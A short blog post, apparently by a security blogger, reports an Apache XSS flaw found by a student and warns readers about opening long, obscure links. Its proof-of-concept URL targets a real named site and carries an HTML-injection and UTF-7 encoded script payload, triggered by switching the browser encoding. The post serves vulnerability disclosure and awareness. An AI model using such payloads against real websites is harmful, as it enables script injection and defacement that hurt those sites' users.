Lament (my best student so far....) discovered a new XSS vulnerability in Apache server (two months ago and still unfixed). read about Cross-site Scripting here.
This vulnerability can show us that we can`t blindly TRUST links from known domain names. In the following POC we can see that walla.co.il is vulnerable just like all the other websites that running Apache server.
POC
Open new Explorer and paste the following link:
http://www.walla.co.il/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqz
bX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblM
XsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYe
Ogc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont
%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('I XSSedYOU!!!')+ADw-/script+AD4---//--
Next, right click on the page and change encoding to auto select. BOOM. A message box should be opened now.
Conclusion, if you recieve a long encrypted link just dont open it. BE AWARE.
About Me
Jack`s Favorite Blogs
-
-
[🌐💧💥] HTTP Cache Cross-Site Leaks5 years ago
-
Goodbye Blog, Hello BackTrack 414 years ago
Get Into Jack`s Box
Posts
Comments
No comments:
Post a Comment